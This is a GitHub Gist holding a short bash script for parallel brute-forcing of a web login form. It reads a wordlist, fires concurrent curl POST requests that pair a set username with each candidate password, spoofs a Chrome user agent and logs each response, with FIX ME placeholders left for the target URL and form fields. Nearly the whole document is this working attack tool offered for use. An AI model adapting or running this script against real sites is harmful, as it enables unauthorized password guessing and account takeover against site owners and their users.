Last active
February 20, 2025 14:26
-
-
Save EthraZa/360ff8c09f5e93df1a7c8773ae6dcc6b to your computer and use it in GitHub Desktop.
Parallel Brute Force in a simple shell script using curl :// - shall we
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| URL="https://WELL_KNOWN_URL" #FIX ME | |
| USERNAME="WELL_KNOWN_USER" #FIX ME | |
| HEADERS="Content-Type: application/x-www-form-urlencoded; charset=UTF-8" #FIX ME | |
| WORDLIST="/usr/share/dirb/wordlists/small.txt" #FIX ME | |
| UA="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" | |
| COOKIE_FILE="cookie.txt" | |
| WLCOUNT=$(wc -l < "$WORDLIST") | |
| CONCURRENCY=$(nproc) | |
| export URL COOKIE_FILE USERNAME HEADERS UA | |
| parallel_process() { | |
| ATTEMPT_NUMBER="$1" | |
| PASSWORD="$2" | |
| WORDLIST_COUNT="$3" | |
| DATA="mod=login&comp=5&user=$USERNAME&pass=$PASSWORD" #FIX ME TOO | |
| RESPONSE=$(curl "$URL" -s --compressed -c "$COOKIE_FILE" -X POST -A "$UA" -H "$HEADERS" --data "$DATA") | |
| echo "Attempt: $ATTEMPT_NUMBER / $WORDLIST_COUNT" | |
| echo "Request: $DATA" | |
| echo "Response: $RESPONSE" | |
| echo "----------------------" | |
| } | |
| export -f parallel_process | |
| cat "$WORDLIST" | awk '{print NR, $0}' | xargs -L 1 -P "$CONCURRENCY" bash -c 'parallel_process "$1" "$2" '"$WLCOUNT"'' _ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment